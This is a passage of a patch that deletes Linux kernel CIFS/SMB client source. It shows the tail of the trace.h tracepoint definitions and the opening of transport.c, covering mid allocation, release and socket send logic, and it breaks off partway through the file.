+-		const char *func_name),
+-	TP_ARGS(xid, func_name),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__string(func_name, func_name)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__assign_str(func_name, func_name);
+-	),
+-	TP_printk("\t%s: xid=%u",
+-		__get_str(func_name), __entry->xid)
+-)
+-
+-#define DEFINE_SMB3_ENTER_EXIT_EVENT(name)        \
+-DEFINE_EVENT(smb3_enter_exit_class, smb3_##name,  \
+-	TP_PROTO(unsigned int xid,		\
+-		const char *func_name),		\
+-	TP_ARGS(xid, func_name))
+-
+-DEFINE_SMB3_ENTER_EXIT_EVENT(enter);
+-DEFINE_SMB3_ENTER_EXIT_EVENT(exit_done);
+-
+-/*
+- * For SMB2/SMB3 tree connect
+- */
+-
+-DECLARE_EVENT_CLASS(smb3_tcon_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		const char *unc_name,
+-		int	rc),
+-	TP_ARGS(xid, tid, sesid, unc_name, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__string(name, unc_name)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__assign_str(name, unc_name);
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x unc_name=%s rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__get_str(name), __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_TCON_EVENT(name)          \
+-DEFINE_EVENT(smb3_tcon_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		const char *unc_name,		\
+-		int	rc),			\
+-	TP_ARGS(xid, tid, sesid, unc_name, rc))
+-
+-DEFINE_SMB3_TCON_EVENT(tcon);
+-
+-
+-/*
+- * For smb2/smb3 open (including create and mkdir) calls
+- */
+-
+-DECLARE_EVENT_CLASS(smb3_open_enter_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		const char *full_path,
+-		int	create_options,
+-		int	desired_access),
+-	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__string(path, full_path)
+-		__field(int, create_options)
+-		__field(int, desired_access)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__assign_str(path, full_path);
+-		__entry->create_options = create_options;
+-		__entry->desired_access = desired_access;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
+-		__entry->create_options, __entry->desired_access)
+-)
+-
+-#define DEFINE_SMB3_OPEN_ENTER_EVENT(name)        \
+-DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		const char *full_path,		\
+-		int	create_options,		\
+-		int	desired_access),	\
+-	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
+-
+-DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
+-DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
+-
+-DECLARE_EVENT_CLASS(smb3_open_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	create_options,
+-		int	desired_access,
+-		int	rc),
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int,   create_options)
+-		__field(int, desired_access)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->create_options = create_options;
+-		__entry->desired_access = desired_access;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__entry->create_options, __entry->desired_access, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_OPEN_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_open_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int	create_options,		\
+-		int	desired_access,		\
+-		int	rc),			\
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc))
+-
+-DEFINE_SMB3_OPEN_ERR_EVENT(open_err);
+-DEFINE_SMB3_OPEN_ERR_EVENT(posix_mkdir_err);
+-
+-DECLARE_EVENT_CLASS(smb3_open_done_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	create_options,
+-		int	desired_access),
+-	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int, create_options)
+-		__field(int, desired_access)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->create_options = create_options;
+-		__entry->desired_access = desired_access;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->create_options, __entry->desired_access)
+-)
+-
+-#define DEFINE_SMB3_OPEN_DONE_EVENT(name)        \
+-DEFINE_EVENT(smb3_open_done_class, smb3_##name,  \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int	create_options,		\
+-		int	desired_access),	\
+-	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access))
+-
+-DEFINE_SMB3_OPEN_DONE_EVENT(open_done);
+-DEFINE_SMB3_OPEN_DONE_EVENT(posix_mkdir_done);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_lease_done_class,
+-	TP_PROTO(__u32	lease_state,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	lease_key_low,
+-		__u64	lease_key_high),
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high),
+-	TP_STRUCT__entry(
+-		__field(__u32, lease_state)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, lease_key_low)
+-		__field(__u64, lease_key_high)
+-	),
+-	TP_fast_assign(
+-		__entry->lease_state = lease_state;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->lease_key_low = lease_key_low;
+-		__entry->lease_key_high = lease_key_high;
+-	),
+-	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x",
+-		__entry->sesid, __entry->tid, __entry->lease_key_high,
+-		__entry->lease_key_low, __entry->lease_state)
+-)
+-
+-#define DEFINE_SMB3_LEASE_DONE_EVENT(name)        \
+-DEFINE_EVENT(smb3_lease_done_class, smb3_##name,  \
+-	TP_PROTO(__u32	lease_state,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	lease_key_low,		\
+-		__u64	lease_key_high),	\
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high))
+-
+-DEFINE_SMB3_LEASE_DONE_EVENT(lease_done);
+-DEFINE_SMB3_LEASE_DONE_EVENT(lease_not_found);
+-
+-DECLARE_EVENT_CLASS(smb3_lease_err_class,
+-	TP_PROTO(__u32	lease_state,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	lease_key_low,
+-		__u64	lease_key_high,
+-		int	rc),
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc),
+-	TP_STRUCT__entry(
+-		__field(__u32, lease_state)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, lease_key_low)
+-		__field(__u64, lease_key_high)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->lease_state = lease_state;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->lease_key_low = lease_key_low;
+-		__entry->lease_key_high = lease_key_high;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x rc=%d",
+-		__entry->sesid, __entry->tid, __entry->lease_key_high,
+-		__entry->lease_key_low, __entry->lease_state, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_LEASE_ERR_EVENT(name)        \
+-DEFINE_EVENT(smb3_lease_err_class, smb3_##name,  \
+-	TP_PROTO(__u32	lease_state,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	lease_key_low,		\
+-		__u64	lease_key_high,		\
+-		int	rc),			\
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc))
+-
+-DEFINE_SMB3_LEASE_ERR_EVENT(lease_err);
+-
+-DECLARE_EVENT_CLASS(smb3_connect_class,
+-	TP_PROTO(char *hostname,
+-		__u64 conn_id,
+-		const struct __kernel_sockaddr_storage *dst_addr),
+-	TP_ARGS(hostname, conn_id, dst_addr),
+-	TP_STRUCT__entry(
+-		__string(hostname, hostname)
+-		__field(__u64, conn_id)
+-		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
+-	),
+-	TP_fast_assign(
+-		struct sockaddr_storage *pss = NULL;
+-
+-		__entry->conn_id = conn_id;
+-		pss = (struct sockaddr_storage *)__entry->dst_addr;
+-		*pss = *dst_addr;
+-		__assign_str(hostname, hostname);
+-	),
+-	TP_printk("conn_id=0x%llx server=%s addr=%pISpsfc",
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->dst_addr)
+-)
+-
+-#define DEFINE_SMB3_CONNECT_EVENT(name)        \
+-DEFINE_EVENT(smb3_connect_class, smb3_##name,  \
+-	TP_PROTO(char *hostname,		\
+-		__u64 conn_id,			\
+-		const struct __kernel_sockaddr_storage *addr),	\
+-	TP_ARGS(hostname, conn_id, addr))
+-
+-DEFINE_SMB3_CONNECT_EVENT(connect_done);
+-
+-DECLARE_EVENT_CLASS(smb3_connect_err_class,
+-	TP_PROTO(char *hostname, __u64 conn_id,
+-		const struct __kernel_sockaddr_storage *dst_addr, int rc),
+-	TP_ARGS(hostname, conn_id, dst_addr, rc),
+-	TP_STRUCT__entry(
+-		__string(hostname, hostname)
+-		__field(__u64, conn_id)
+-		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		struct sockaddr_storage *pss = NULL;
+-
+-		__entry->conn_id = conn_id;
+-		__entry->rc = rc;
+-		pss = (struct sockaddr_storage *)__entry->dst_addr;
+-		*pss = *dst_addr;
+-		__assign_str(hostname, hostname);
+-	),
+-	TP_printk("rc=%d conn_id=0x%llx server=%s addr=%pISpsfc",
+-		__entry->rc,
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->dst_addr)
+-)
+-
+-#define DEFINE_SMB3_CONNECT_ERR_EVENT(name)        \
+-DEFINE_EVENT(smb3_connect_err_class, smb3_##name,  \
+-	TP_PROTO(char *hostname,		\
+-		__u64 conn_id,			\
+-		const struct __kernel_sockaddr_storage *addr,	\
+-		int rc),			\
+-	TP_ARGS(hostname, conn_id, addr, rc))
+-
+-DEFINE_SMB3_CONNECT_ERR_EVENT(connect_err);
+-
+-DECLARE_EVENT_CLASS(smb3_reconnect_class,
+-	TP_PROTO(__u64	currmid,
+-		__u64 conn_id,
+-		char *hostname),
+-	TP_ARGS(currmid, conn_id, hostname),
+-	TP_STRUCT__entry(
+-		__field(__u64, currmid)
+-		__field(__u64, conn_id)
+-		__string(hostname, hostname)
+-	),
+-	TP_fast_assign(
+-		__entry->currmid = currmid;
+-		__entry->conn_id = conn_id;
+-		__assign_str(hostname, hostname);
+-	),
+-	TP_printk("conn_id=0x%llx server=%s current_mid=%llu",
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->currmid)
+-)
+-
+-#define DEFINE_SMB3_RECONNECT_EVENT(name)        \
+-DEFINE_EVENT(smb3_reconnect_class, smb3_##name,  \
+-	TP_PROTO(__u64	currmid,		\
+-		__u64 conn_id,			\
+-		char *hostname),				\
+-	TP_ARGS(currmid, conn_id, hostname))
+-
+-DEFINE_SMB3_RECONNECT_EVENT(reconnect);
+-DEFINE_SMB3_RECONNECT_EVENT(partial_send_reconnect);
+-
+-DECLARE_EVENT_CLASS(smb3_credit_class,
+-	TP_PROTO(__u64	currmid,
+-		__u64 conn_id,
+-		char *hostname,
+-		int credits,
+-		int credits_to_add,
+-		int in_flight),
+-	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight),
+-	TP_STRUCT__entry(
+-		__field(__u64, currmid)
+-		__field(__u64, conn_id)
+-		__string(hostname, hostname)
+-		__field(int, credits)
+-		__field(int, credits_to_add)
+-		__field(int, in_flight)
+-	),
+-	TP_fast_assign(
+-		__entry->currmid = currmid;
+-		__entry->conn_id = conn_id;
+-		__assign_str(hostname, hostname);
+-		__entry->credits = credits;
+-		__entry->credits_to_add = credits_to_add;
+-		__entry->in_flight = in_flight;
+-	),
+-	TP_printk("conn_id=0x%llx server=%s current_mid=%llu "
+-			"credits=%d credit_change=%d in_flight=%d",
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->currmid,
+-		__entry->credits,
+-		__entry->credits_to_add,
+-		__entry->in_flight)
+-)
+-
+-#define DEFINE_SMB3_CREDIT_EVENT(name)        \
+-DEFINE_EVENT(smb3_credit_class, smb3_##name,  \
+-	TP_PROTO(__u64	currmid,		\
+-		__u64 conn_id,			\
+-		char *hostname,			\
+-		int  credits,			\
+-		int  credits_to_add,	\
+-		int in_flight),			\
+-	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight))
+-
+-DEFINE_SMB3_CREDIT_EVENT(reconnect_with_invalid_credits);
+-DEFINE_SMB3_CREDIT_EVENT(reconnect_detected);
+-DEFINE_SMB3_CREDIT_EVENT(credit_timeout);
+-DEFINE_SMB3_CREDIT_EVENT(insufficient_credits);
+-DEFINE_SMB3_CREDIT_EVENT(too_many_credits);
+-DEFINE_SMB3_CREDIT_EVENT(add_credits);
+-DEFINE_SMB3_CREDIT_EVENT(adj_credits);
+-DEFINE_SMB3_CREDIT_EVENT(hdr_credits);
+-DEFINE_SMB3_CREDIT_EVENT(nblk_credits);
+-DEFINE_SMB3_CREDIT_EVENT(pend_credits);
+-DEFINE_SMB3_CREDIT_EVENT(wait_credits);
+-DEFINE_SMB3_CREDIT_EVENT(waitff_credits);
+-DEFINE_SMB3_CREDIT_EVENT(overflow_credits);
+-DEFINE_SMB3_CREDIT_EVENT(set_credits);
+-
+-#endif /* _CIFS_TRACE_H */
+-
+-#undef TRACE_INCLUDE_PATH
+-#define TRACE_INCLUDE_PATH .
+-#define TRACE_INCLUDE_FILE trace
+-#include <trace/define_trace.h>
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+deleted file mode 100644
+index c961b90f92b9f..0000000000000
+--- a/fs/cifs/transport.c
++++ /dev/null
+@@ -1,1807 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *   Jeremy Allison (jra@samba.org) 2006.
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/list.h>
+-#include <linux/gfp.h>
+-#include <linux/wait.h>
+-#include <linux/net.h>
+-#include <linux/delay.h>
+-#include <linux/freezer.h>
+-#include <linux/tcp.h>
+-#include <linux/bvec.h>
+-#include <linux/highmem.h>
+-#include <linux/uaccess.h>
+-#include <asm/processor.h>
+-#include <linux/mempool.h>
+-#include <linux/sched/signal.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "smb2proto.h"
+-#include "smbdirect.h"
+-
+-/* Max number of iovectors we can use off the stack when sending requests. */
+-#define CIFS_MAX_IOV_SIZE 8
+-
+-void
+-cifs_wake_up_task(struct mid_q_entry *mid)
+-{
+-	wake_up_process(mid->callback_data);
+-}
+-
+-static struct mid_q_entry *
+-alloc_mid(const struct smb_hdr *smb_buffer, struct TCP_Server_Info *server)
+-{
+-	struct mid_q_entry *temp;
+-
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "%s: null TCP session\n", __func__);
+-		return NULL;
+-	}
+-
+-	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
+-	memset(temp, 0, sizeof(struct mid_q_entry));
+-	kref_init(&temp->refcount);
+-	temp->mid = get_mid(smb_buffer);
+-	temp->pid = current->pid;
+-	temp->command = cpu_to_le16(smb_buffer->Command);
+-	cifs_dbg(FYI, "For smb_command %d\n", smb_buffer->Command);
+-	/*	do_gettimeofday(&temp->when_sent);*/ /* easier to use jiffies */
+-	/* when mid allocated can be before when sent */
+-	temp->when_alloc = jiffies;
+-	temp->server = server;
+-
+-	/*
+-	 * The default is for the mid to be synchronous, so the
+-	 * default callback just wakes up the current task.
+-	 */
+-	get_task_struct(current);
+-	temp->creator = current;
+-	temp->callback = cifs_wake_up_task;
+-	temp->callback_data = current;
+-
+-	atomic_inc(&mid_count);
+-	temp->mid_state = MID_REQUEST_ALLOCATED;
+-	return temp;
+-}
+-
+-static void __release_mid(struct kref *refcount)
+-{
+-	struct mid_q_entry *midEntry =
+-			container_of(refcount, struct mid_q_entry, refcount);
+-#ifdef CONFIG_CIFS_STATS2
+-	__le16 command = midEntry->server->vals->lock_cmd;
+-	__u16 smb_cmd = le16_to_cpu(midEntry->command);
+-	unsigned long now;
+-	unsigned long roundtrip_time;
+-#endif
+-	struct TCP_Server_Info *server = midEntry->server;
+-
+-	if (midEntry->resp_buf && (midEntry->mid_flags & MID_WAIT_CANCELLED) &&
+-	    midEntry->mid_state == MID_RESPONSE_RECEIVED &&
+-	    server->ops->handle_cancelled_mid)
+-		server->ops->handle_cancelled_mid(midEntry, server);
+-
+-	midEntry->mid_state = MID_FREE;
+-	atomic_dec(&mid_count);
+-	if (midEntry->large_buf)
+-		cifs_buf_release(midEntry->resp_buf);
+-	else
+-		cifs_small_buf_release(midEntry->resp_buf);
+-#ifdef CONFIG_CIFS_STATS2
+-	now = jiffies;
+-	if (now < midEntry->when_alloc)
+-		cifs_server_dbg(VFS, "Invalid mid allocation time\n");
+-	roundtrip_time = now - midEntry->when_alloc;
+-
+-	if (smb_cmd < NUMBER_OF_SMB2_COMMANDS) {
+-		if (atomic_read(&server->num_cmds[smb_cmd]) == 0) {
+-			server->slowest_cmd[smb_cmd] = roundtrip_time;
+-			server->fastest_cmd[smb_cmd] = roundtrip_time;
+-		} else {
+-			if (server->slowest_cmd[smb_cmd] < roundtrip_time)
+-				server->slowest_cmd[smb_cmd] = roundtrip_time;
+-			else if (server->fastest_cmd[smb_cmd] > roundtrip_time)
+-				server->fastest_cmd[smb_cmd] = roundtrip_time;
+-		}
+-		cifs_stats_inc(&server->num_cmds[smb_cmd]);
+-		server->time_per_cmd[smb_cmd] += roundtrip_time;
+-	}
+-	/*
+-	 * commands taking longer than one second (default) can be indications
+-	 * that something is wrong, unless it is quite a slow link or a very
+-	 * busy server. Note that this calc is unlikely or impossible to wrap
+-	 * as long as slow_rsp_threshold is not set way above recommended max
+-	 * value (32767 ie 9 hours) and is generally harmless even if wrong
+-	 * since only affects debug counters - so leaving the calc as simple
+-	 * comparison rather than doing multiple conversions and overflow
+-	 * checks
+-	 */
+-	if ((slow_rsp_threshold != 0) &&
+-	    time_after(now, midEntry->when_alloc + (slow_rsp_threshold * HZ)) &&
+-	    (midEntry->command != command)) {
+-		/*
+-		 * smb2slowcmd[NUMBER_OF_SMB2_COMMANDS] counts by command
+-		 * NB: le16_to_cpu returns unsigned so can not be negative below
+-		 */
+-		if (smb_cmd < NUMBER_OF_SMB2_COMMANDS)
+-			cifs_stats_inc(&server->smb2slowcmd[smb_cmd]);
+-
+-		trace_smb3_slow_rsp(smb_cmd, midEntry->mid, midEntry->pid,
+-			       midEntry->when_sent, midEntry->when_received);
+-		if (cifsFYI & CIFS_TIMER) {
+-			pr_debug("slow rsp: cmd %d mid %llu",
+-				 midEntry->command, midEntry->mid);
+-			cifs_info("A: 0x%lx S: 0x%lx R: 0x%lx\n",
+-				  now - midEntry->when_alloc,
+-				  now - midEntry->when_sent,
+-				  now - midEntry->when_received);
+-		}
+-	}
+-#endif
+-	put_task_struct(midEntry->creator);
+-
+-	mempool_free(midEntry, cifs_mid_poolp);
+-}
+-
+-void release_mid(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->server;
+-
+-	spin_lock(&server->mid_lock);
+-	kref_put(&mid->refcount, __release_mid);
+-	spin_unlock(&server->mid_lock);
+-}
+-
+-void
+-delete_mid(struct mid_q_entry *mid)
+-{
+-	spin_lock(&mid->server->mid_lock);
+-	if (!(mid->mid_flags & MID_DELETED)) {
+-		list_del_init(&mid->qhead);
+-		mid->mid_flags |= MID_DELETED;
+-	}
+-	spin_unlock(&mid->server->mid_lock);
+-
+-	release_mid(mid);
+-}
+-
+-/*
+- * smb_send_kvec - send an array of kvecs to the server
+- * @server:	Server to send the data to
+- * @smb_msg:	Message to send
+- * @sent:	amount of data sent on socket is stored here
+- *
+- * Our basic "send data to server" function. Should be called with srv_mutex
+- * held. The caller is responsible for handling the results.
+- */
+-static int
+-smb_send_kvec(struct TCP_Server_Info *server, struct msghdr *smb_msg,
+-	      size_t *sent)
+-{
+-	int rc = 0;
+-	int retries = 0;
+-	struct socket *ssocket = server->ssocket;
+-
+-	*sent = 0;
+-
+-	if (server->noblocksnd)
+-		smb_msg->msg_flags = MSG_DONTWAIT + MSG_NOSIGNAL;
+-	else
+-		smb_msg->msg_flags = MSG_NOSIGNAL;
+-
+-	while (msg_data_left(smb_msg)) {
+-		/*
+-		 * If blocking send, we try 3 times, since each can block
+-		 * for 5 seconds. For nonblocking  we have to try more
+-		 * but wait increasing amounts of time allowing time for
+-		 * socket to clear.  The overall time we wait in either
+-		 * case to send on the socket is about 15 seconds.
+-		 * Similarly we wait for 15 seconds for a response from
+-		 * the server in SendReceive[2] for the server to send
+-		 * a response back for most types of requests (except
+-		 * SMB Write past end of file which can be slow, and
+-		 * blocking lock operations). NFS waits slightly longer
+-		 * than CIFS, but this can make it take longer for
+-		 * nonresponsive servers to be detected and 15 seconds
+-		 * is more than enough time for modern networks to
+-		 * send a packet.  In most cases if we fail to send
+-		 * after the retries we will kill the socket and
+-		 * reconnect which may clear the network problem.
+-		 */
+-		rc = sock_sendmsg(ssocket, smb_msg);
+-		if (rc == -EAGAIN) {
+-			retries++;
+-			if (retries >= 14 ||
+-			    (!server->noblocksnd && (retries > 2))) {
+-				cifs_server_dbg(VFS, "sends on sock %p stuck for 15 seconds\n",
+-					 ssocket);
+-				return -EAGAIN;
+-			}
+-			msleep(1 << retries);
+-			continue;
+-		}
+-
+-		if (rc < 0)
+-			return rc;
+-
+-		if (rc == 0) {
+-			/* should never happen, letting socket clear before
+-			   retrying is our only obvious option here */
+-			cifs_server_dbg(VFS, "tcp sent no data\n");
+-			msleep(500);
+-			continue;
+-		}
+-
+-		/* send was at least partially successful */
+-		*sent += rc;
+-		retries = 0; /* in case we get ENOSPC on the next send */
+-	}
+-	return 0;
+-}
+-
+-unsigned long
+-smb_rqst_len(struct TCP_Server_Info *server, struct smb_rqst *rqst)
+-{
+-	unsigned int i;
+-	struct kvec *iov;
+-	int nvec;
+-	unsigned long buflen = 0;
+-
+-	if (!is_smb1(server) && rqst->rq_nvec >= 2 &&
+-	    rqst->rq_iov[0].iov_len == 4) {
+-		iov = &rqst->rq_iov[1];
+-		nvec = rqst->rq_nvec - 1;
+-	} else {
+-		iov = rqst->rq_iov;
+-		nvec = rqst->rq_nvec;
+-	}
+-
+-	/* total up iov array first */
+-	for (i = 0; i < nvec; i++)
+-		buflen += iov[i].iov_len;
+-
+-	/*
+-	 * Add in the page array if there is one. The caller needs to make
+-	 * sure rq_offset and rq_tailsz are set correctly. If a buffer of
+-	 * multiple pages ends at page boundary, rq_tailsz needs to be set to
+-	 * PAGE_SIZE.
+-	 */
+-	if (rqst->rq_npages) {
+-		if (rqst->rq_npages == 1)
+-			buflen += rqst->rq_tailsz;
+-		else {
+-			/*
+-			 * If there is more than one page, calculate the
+-			 * buffer length based on rq_offset and rq_tailsz
+-			 */
+-			buflen += rqst->rq_pagesz * (rqst->rq_npages - 1) -
+-					rqst->rq_offset;
+-			buflen += rqst->rq_tailsz;
+-		}
+-	}
+-
+-	return buflen;
+-}
+-
+-static int
+-__smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+-		struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct kvec *iov;
+-	int n_vec;
+-	unsigned int send_length = 0;
+-	unsigned int i, j;
+-	sigset_t mask, oldmask;
+-	size_t total_len = 0, sent, size;
+-	struct socket *ssocket = server->ssocket;
+-	struct msghdr smb_msg = {};
+-	__be32 rfc1002_marker;
+-
+-	cifs_in_send_inc(server);
+-	if (cifs_rdma_enabled(server)) {
+-		/* return -EAGAIN when connecting or reconnecting */
+-		rc = -EAGAIN;
+-		if (server->smbd_conn)
+-			rc = smbd_send(server, num_rqst, rqst);
+-		goto smbd_done;
+-	}
+-
+-	rc = -EAGAIN;
+-	if (ssocket == NULL)
+-		goto out;
+-
+-	rc = -ERESTARTSYS;
+-	if (fatal_signal_pending(current)) {
+-		cifs_dbg(FYI, "signal pending before send request\n");
+-		goto out;
+-	}
+-
+-	rc = 0;
+-	/* cork the socket */
+-	tcp_sock_set_cork(ssocket->sk, true);
+-
+-	for (j = 0; j < num_rqst; j++)
+-		send_length += smb_rqst_len(server, &rqst[j]);
+-	rfc1002_marker = cpu_to_be32(send_length);
+-
+-	/*
+-	 * We should not allow signals to interrupt the network send because
+-	 * any partial send will cause session reconnects thus increasing
+-	 * latency of system calls and overload a server with unnecessary
+-	 * requests.
+-	 */
+-
+-	sigfillset(&mask);
+-	sigprocmask(SIG_BLOCK, &mask, &oldmask);
+-
+-	/* Generate a rfc1002 marker for SMB2+ */
+-	if (!is_smb1(server)) {
+-		struct kvec hiov = {
+-			.iov_base = &rfc1002_marker,
+-			.iov_len  = 4
+-		};
+-		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, &hiov, 1, 4);
+-		rc = smb_send_kvec(server, &smb_msg, &sent);
+-		if (rc < 0)
+-			goto unmask;
+-
+-		total_len += sent;
+-		send_length += 4;
+-	}
+-
+-	cifs_dbg(FYI, "Sending smb: smb_len=%u\n", send_length);
+-
+-	for (j = 0; j < num_rqst; j++) {
+-		iov = rqst[j].rq_iov;
+-		n_vec = rqst[j].rq_nvec;
+-
+-		size = 0;
+-		for (i = 0; i < n_vec; i++) {
+-			dump_smb(iov[i].iov_base, iov[i].iov_len);
+-			size += iov[i].iov_len;
+-		}
+-
+-		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, iov, n_vec, size);
+-
+-		rc = smb_send_kvec(server, &smb_msg, &sent);
+-		if (rc < 0)
+-			goto unmask;
+-
+-		total_len += sent;
+-
+-		/* now walk the page array and send each page in it */
+-		for (i = 0; i < rqst[j].rq_npages; i++) {
+-			struct bio_vec bvec;
+-
+-			bvec.bv_page = rqst[j].rq_pages[i];
+-			rqst_page_get_length(&rqst[j], i, &bvec.bv_len,
+-					     &bvec.bv_offset);
+-
+-			iov_iter_bvec(&smb_msg.msg_iter, ITER_SOURCE,
+-				      &bvec, 1, bvec.bv_len);
+-			rc = smb_send_kvec(server, &smb_msg, &sent);
+-			if (rc < 0)
+-				break;
+-
+-			total_len += sent;
+-		}
+-	}
+-
+-unmask:
+-	sigprocmask(SIG_SETMASK, &oldmask, NULL);
+-
+-	/*
+-	 * If signal is pending but we have already sent the whole packet to
+-	 * the server we need to return success status to allow a corresponding
+-	 * mid entry to be kept in the pending requests queue thus allowing
+-	 * to handle responses from the server by the client.
+-	 *
+-	 * If only part of the packet has been sent there is no need to hide
+-	 * interrupt because the session will be reconnected anyway, so there
+-	 * won't be any response from the server to handle.
+-	 */
+-
+-	if (signal_pending(current) && (total_len != send_length)) {
+-		cifs_dbg(FYI, "signal is pending after attempt to send\n");
+-		rc = -ERESTARTSYS;
+-	}
+-
+-	/* uncork it */
+-	tcp_sock_set_cork(ssocket->sk, false);
+-
+-	if ((total_len > 0) && (total_len != send_length)) {
+-		cifs_dbg(FYI, "partial send (wanted=%u sent=%zu): terminating session\n",
+-			 send_length, total_len);
+-		/*
+-		 * If we have only sent part of an SMB then the next SMB could
+-		 * be taken as the remainder of this one. We need to kill the
+-		 * socket so the server throws away the partial SMB
+-		 */
+-		cifs_signal_cifsd_for_reconnect(server, false);
+-		trace_smb3_partial_send_reconnect(server->CurrentMid,
+-						  server->conn_id, server->hostname);
+-	}
+-smbd_done:
+-	if (rc < 0 && rc != -EINTR)
+-		cifs_server_dbg(VFS, "Error %d sending data on socket to server\n",
+-			 rc);
+-	else if (rc > 0)
+-		rc = 0;
+-out:
+-	cifs_in_send_dec(server);
+-	return rc;
+-}
+-
+-static int
